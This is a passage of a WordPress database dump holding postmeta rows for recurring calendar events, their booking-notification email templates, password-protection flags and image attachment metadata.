/>\r\n%%blog_name%%</p>\";}}'),(141343,264891,'passster_activate_global_protection',NULL),(141344,264891,'passster_activate_protection',NULL),(141345,264891,'passster_protection_type','password'),(141346,264431,'_edit_lock','1654657373:2'),(141347,264431,'_edit_last','2'),(141348,264431,'show_only_one_occurrence','0'),(141349,264431,'show_ongoing_events','0'),(144096,265215,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:693;s:6:\"height\";i:362;s:4:\"file\";s:28:\"2021/07/sunset-horizon-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"sunset-horizon-1-300x157.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:157;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"sunset-horizon-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:28:\"sunset-horizon-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:28:\"sunset-horizon-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:28:\"sunset-horizon-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:28:\"sunset-horizon-1-300x362.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:362;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"sunset-horizon-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(143994,265208,'_field_224','Jane'),(143995,265208,'_field_225','Taylor'),(141356,264893,'protect_children',''),(141357,264893,'protect_children',''),(141358,264893,'_edit_lock','1631474230:2'),(141359,264893,'_edit_last','2'),(151704,266076,'_wp_attached_file','2021/12/generic-event-6-1.jpg'),(141361,264893,'mec_color',''),(141362,264893,'mec_location_id','118'),(141363,264893,'mec_dont_show_map','0'),(141364,264893,'mec_organizer_id','1'),(141365,264893,'mec_read_more',''),(141366,264893,'mec_more_info',''),(141367,264893,'mec_more_info_title',''),(141368,264893,'mec_more_info_target','_self'),(141369,264893,'mec_cost',''),(141370,264893,'mec_currency','a:0:{}'),(141371,264893,'mec_additional_organizer_ids','a:0:{}'),(141372,264893,'mec_additional_location_ids','a:0:{}'),(141373,264893,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-05-23\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-05-23\";s:4:\"hour\";s:2:\"12\";s:7:\"minutes\";s:2:\"15\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.4\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"10/24/2021\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(141374,264893,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.4\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"10/24/2021\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(141375,264893,'mec_certain_weekdays','a:0:{}'),(141376,264893,'mec_allday','0'),(141377,264893,'one_occurrence','0'),(141378,264893,'mec_hide_time','0'),(141379,264893,'mec_hide_end_time','0'),(141380,264893,'mec_comment',''),(141381,264893,'mec_timezone','global'),(141382,264893,'mec_countdown_method','global'),(141383,264893,'mec_public','1'),(141384,264893,'mec_start_date','2021-05-23'),(141385,264893,'mec_start_time_hour','10'),(141386,264893,'mec_start_time_minutes','0'),(141387,264893,'mec_start_time_ampm','AM'),(141388,264893,'mec_start_day_seconds','36000'),(141389,264893,'mec_end_date','2021-05-23'),(141390,264893,'mec_end_time_hour','12'),(141391,264893,'mec_end_time_minutes','15'),(141392,264893,'mec_end_time_ampm','PM'),(141393,264893,'mec_end_day_seconds','44100'),(141394,264893,'mec_repeat_status','1'),(141395,264893,'mec_repeat_type','advanced'),(141396,264893,'mec_repeat_interval','1'),(141397,264893,'mec_repeat_end','date'),(141398,264893,'mec_repeat_end_at_occurrences','9'),(141399,264893,'mec_repeat_end_at_date','2021-10-24'),(141400,264893,'mec_advanced_days','a:1:{i:0;s:5:\"Sun.4\";}'),(141401,264893,'mec_in_days',''),(141402,264893,'mec_not_in_days',''),(141403,264893,'mec_hourly_schedules','a:0:{}'),(141404,264893,'mec_booking','a:0:{}'),(141405,264893,'mec_tickets','a:0:{}'),(141406,264893,'mec_fees_global_inheritance','1'),(141407,264893,'mec_fees','a:0:{}'),(141408,264893,'mec_ticket_variations_global_inheritance','1'),(141409,264893,'mec_ticket_variations','a:0:{}'),(141410,264893,'mec_reg_fields_global_inheritance','1'),(141411,264893,'mec_reg_fields','a:0:{}'),(141412,264893,'mec_bfixed_fields','a:0:{}'),(141413,264893,'mec_op','a:0:{}'),(141414,264893,'mec_fields','a:0:{}'),(141415,264893,'mec_event_status','EventScheduled'),(141416,264893,'mec_moved_online_link',''),(141417,264893,'mec_cancelled_reason',''),(141418,264893,'mec_display_cancellation_reason_in_single_page',''),(141419,264893,'boldgrid_hide_page_title','0'),(141420,264893,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(141421,264893,'passster_activate_global_protection',NULL),(141422,264893,'passster_activate_protection',NULL),(141423,264893,'passster_protection_type','password'),(141456,264894,'mec_start_day_seconds','37800'),(141457,264894,'mec_end_date','2021-06-06'),(141458,264894,'mec_end_time_hour','12'),(141459,264894,'mec_end_time_minutes','0'),(141460,264894,'mec_end_time_ampm','PM'),(141461,264894,'mec_end_day_seconds','43200'),(141462,264894,'mec_repeat_status','1'),(141463,264894,'mec_repeat_type','advanced'),(141464,264894,'mec_repeat_interval','1'),(141465,264894,'mec_repeat_end','date'),(141466,264894,'mec_repeat_end_at_occurrences','9'),(141467,264894,'mec_repeat_end_at_date','2022-02-06'),(141468,264894,'mec_advanced_days','a:1:{i:0;s:5:\"Sun.1\";}'),(141469,264894,'mec_in_days',''),(141470,264894,'mec_not_in_days',''),(141471,264894,'mec_hourly_schedules','a:0:{}'),(141472,264894,'mec_booking','a:0:{}'),(141473,264894,'mec_tickets','a:0:{}'),(141474,264894,'mec_fees_global_inheritance','1'),(141475,264894,'mec_fees','a:0:{}'),(141476,264894,'mec_ticket_variations_global_inheritance','1'),(141477,264894,'mec_ticket_variations','a:0:{}'),(141478,264894,'mec_reg_fields_global_inheritance','1'),(141479,264894,'mec_reg_fields','a:0:{}'),(141480,264894,'mec_bfixed_fields','a:0:{}'),(141481,264894,'mec_op','a:0:{}'),(141482,264894,'mec_fields','a:0:{}'),(141483,264894,'mec_event_status','EventScheduled'),(141484,264894,'mec_moved_online_link',''),(141485,264894,'mec_cancelled_reason',''),(141486,264894,'mec_display_cancellation_reason_in_single_page',''),(141487,264894,'boldgrid_hide_page_title','0'),(141488,264894,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(141489,264894,'passster_activate_global_protection',NULL),(141490,264894,'passster_activate_protection',NULL),(141491,264894,'passster_protection_type','password'),(144768,265263,'_form_id','48'),(144769,265263,'_seq_num','7'),(141495,264610,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(159353,264610,'boldgrid_in_page_containers','1'),(159354,266543,'mec_color',''),(159355,266543,'mec_location_id','118'),(159356,266543,'mec_dont_show_map','0'),(159357,266543,'mec_organizer_id','1'),(159358,266543,'mec_read_more',''),(159359,266543,'mec_more_info',''),(141496,264610,'passster_activate_global_protection',NULL),(141497,264610,'passster_activate_protection',NULL),(141498,264610,'passster_protection_type','password'),(143538,265140,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:719;s:6:\"height\";i:384;s:4:\"file\";s:27:\"2021/06/sos-notext-2021.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"sos-notext-2021-300x160.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"sos-notext-2021-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:27:\"sos-notext-2021-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:27:\"sos-notext-2021-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:27:\"sos-notext-2021-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:27:\"sos-notext-2021-300x384.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:384;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"sos-notext-2021-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(143537,265140,'_wp_attached_file','2021/06/sos-notext-2021.jpg'),(143536,265139,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:719;s:6:\"height\";i:385;s:4:\"file\";s:37:\"2021/06/satsang-class-notext-2021.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"satsang-class-notext-2021-300x161.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:161;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"satsang-class-notext-2021-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:37:\"satsang-class-notext-2021-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:37:\"satsang-class-notext-2021-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:37:\"satsang-class-notext-2021-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:37:\"satsang-class-notext-2021-300x385.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:37:\"satsang-class-notext-2021-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(143535,265139,'_wp_attached_file','2021/06/satsang-class-notext-2021.jpg'),(141566,264896,'protect_children',''),(141567,264896,'protect_children',''),(141568,264896,'_edit_lock','1620593518:2'),(141569,264896,'_edit_last','2'),(151762,266078,'mec_not_in_days',''),(141571,264896,'mec_color',''),(141572,264896,'mec_location_id','118'),(141573,264896,'mec_dont_show_map','0'),(141574,264896,'mec_organizer_id','1'),(141575,264896,'mec_read_more',''),(141576,264896,'mec_more_info',''),(141577,264896,'mec_more_info_title',''),(141578,264896,'mec_more_info_target','_self'),(141579,264896,'mec_cost',''),(141580,264896,'mec_currency','a:0:{}'),(141581,264896,'mec_additional_organizer_ids','a:0:{}'),(141582,264896,'mec_additional_location_ids','a:0:{}'),(141583,264896,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-06-06\";s:4:\"hour\";s:2:\"12\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-06-06\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.1\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"11/07/2021\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(141584,264896,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.1\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"11/07/2021\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(141585,264896,'mec_certain_weekdays','a:0:{}'),(141586,264896,'mec_allday','0'),(141587,264896,'one_occurrence','0'),(141588,264896,'mec_hide_time','0'),(141589,264896,'mec_hide_end_time','0'),(141590,264896,'mec_comment',''),(141591,264896,'mec_timezone','global'),(141592,264896,'mec_countdown_method','global'),(141593,264896,'mec_public','1'),(141594,264896,'mec_start_date','2021-06-06'),(141595,264896,'mec_start_time_hour','12'),(141596,264896,'mec_start_time_minutes','0'),(141597,264896,'mec_start_time_ampm','PM'),(141598,264896,'mec_start_day_seconds','43200'),(141599,264896,'mec_end_date','2021-06-06'),(141600,264896,'mec_end_time_hour','1'),(141601,264896,'mec_end_time_minutes','30'),(141602,264896,'mec_end_time_ampm','PM'),(141603,264896,'mec_end_day_seconds','48600'),(141604,264896,'mec_repeat_status','1'),(141605,264896,'mec_repeat_type','advanced'),(141606,264896,'mec_repeat_interval','1'),(141607,264896,'mec_repeat_end','date'),(141608,264896,'mec_repeat_end_at_occurrences','9'),(141609,264896,'mec_repeat_end_at_date','2021-11-07'),(141610,264896,'mec_advanced_days','a:1:{i:0;s:5:\"Sun.1\";}'),(141611,264896,'mec_in_days',''),(141612,264896,'mec_not_in_days',''),(141613,264896,'mec_hourly_schedules','a:0:{}'),(141614,264896,'mec_booking','a:0:{}'),(141615,264896,'mec_tickets','a:0:{}'),(141616,264896,'mec_fees_global_inheritance','1'),(141617,264896,'mec_fees','a:0:{}'),(141618,264896,'mec_ticket_variations_global_inheritance','1'),(141619,264896,'mec_ticket_variations','a:0:{}'),(141620,264896,'mec_reg_fields_global_inheritance','1'),(141621,264896,'mec_reg_fields','a:0:{}'),(141622,264896,'mec_bfixed_fields','a:0:{}'),(141623,264896,'mec_op','a:0:{}'),(141624,264896,'mec_fields','a:0:{}'),(141625,264896,'mec_event_status','EventScheduled'),(141626,264896,'mec_moved_online_link',''),(141627,264896,'mec_cancelled_reason',''),(141628,264896,'mec_display_cancellation_reason_in_single_page',''),(141629,264896,'boldgrid_hide_page_title','0'),(141630,264896,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(141631,264896,'passster_activate_global_protection',NULL),(141632,264896,'passster_activate_protection',NULL),(141633,264896,'passster_protection_type','password'),(141634,264898,'protect_children',''),(141635,264898,'protect_children',''),(141636,264898,'_edit_lock','1620611940:2'),(141637,264898,'_edit_last','2'),(151761,266078,'mec_in_days',''),(141639,264898,'mec_color',''),(141640,264898,'mec_location_id','118'),(141641,264898,'mec_dont_show_map','0'),(141642,264898,'mec_organizer_id','1'),(141643,264898,'mec_read_more',''),(141644,264898,'mec_more_info',''),(141645,264898,'mec_more_info_title',''),(141646,264898,'mec_more_info_target','_self'),(141647,264898,'mec_cost',''),(141648,264898,'mec_currency','a:0:{}'),(141649,264898,'mec_additional_organizer_ids','a:0:{}'),(141650,264898,'mec_additional_location_ids','a:0:{}'),(141651,264898,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-05-10\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-05-10\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Mon.2\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"11/08/2021\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(141652,264898,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Mon.2\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"11/08/2021\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(141653,264898,'mec_certain_weekdays','a:0:{}'),(141654,264898,'mec_allday','0'),(141655,264898,'one_occurrence','0'),(141656,264898,'mec_hide_time','0'),(141657,264898,'mec_hide_end_time','0'),(141658,264898,'mec_comment',''),(141659,264898,'mec_timezone','global'),(141660,264898,'mec_countdown_method','global'),(141661,264898,'mec_public','1'),(141662,264898,'mec_start_date','2021-05-10'),(141663,264898,'mec_start_time_hour','7'),(141664,264898,'mec_start_time_minutes','0'),(141665,264898,'mec_start_time_ampm','PM'),(141666,264898,'mec_start_day_seconds','68400'),(141667,264898,'mec_end_date','2021-05-10'),(141668,264898,'mec_end_time_hour','8'),(141669,264898,'mec_end_time_minutes','30'),(141670,264898,'mec_end_time_ampm','PM'),(141671,264898,'mec_end_day_seconds','73800'),(141672,264898,'mec_repeat_status','1'),(141673,264898,'mec_repeat_type','advanced'),(141674,264898,'mec_repeat_interval','1'),(141675,264898,'mec_repeat_end','date'),(141676,264898,'mec_repeat_end_at_occurrences','9'),(141677,264898,'mec_repeat_end_at_date','2021-11-08'),(141678,264898,'mec_advanced_days','a:1:{i:0;s:5:\"Mon.2\";}'),(141679,264898,'mec_in_days',''),(141680,264898,'mec_not_in_days',''),(141681,264898,'mec_hourly_schedules','a:0:{}'),(141682,264898,'mec_booking','a:0:{}'),(141683,264898,'mec_tickets','a:0:{}'),(141684,264898,'mec_fees_global_inheritance','1'),(141685,264898,'mec_fees','a:0:{}'),(141686,264898,'mec_ticket_variations_global_inheritance','1'),(141687,264898,'mec_ticket_variations','a:0:{}'),(141688,264898,'mec_reg_fields_global_inheritance','1'),(141689,264898,'mec_reg_fields','a:0:{}'),(141690,264898,'mec_bfixed_fields','a:0:{}'),(141691,264898,'mec_op','a:0:{}'),(141692,264898,'mec_fields','a:0:{}'),(141693,264898,'mec_event_status','EventScheduled'),(141694,264898,'mec_moved_online_link',''),(141695,264898,'mec_cancelled_reason',''),(141696,264898,'mec_display_cancellation_reason_in_single_page',''),(141697,264898,'boldgrid_hide_page_title','0'),(141698,264898,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(141699,264898,'passster_activate_global_protection',NULL),(141700,264898,'passster_activate_protection',NULL),(141701,264898,'passster_protection_type','password'),(141705,264640,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br 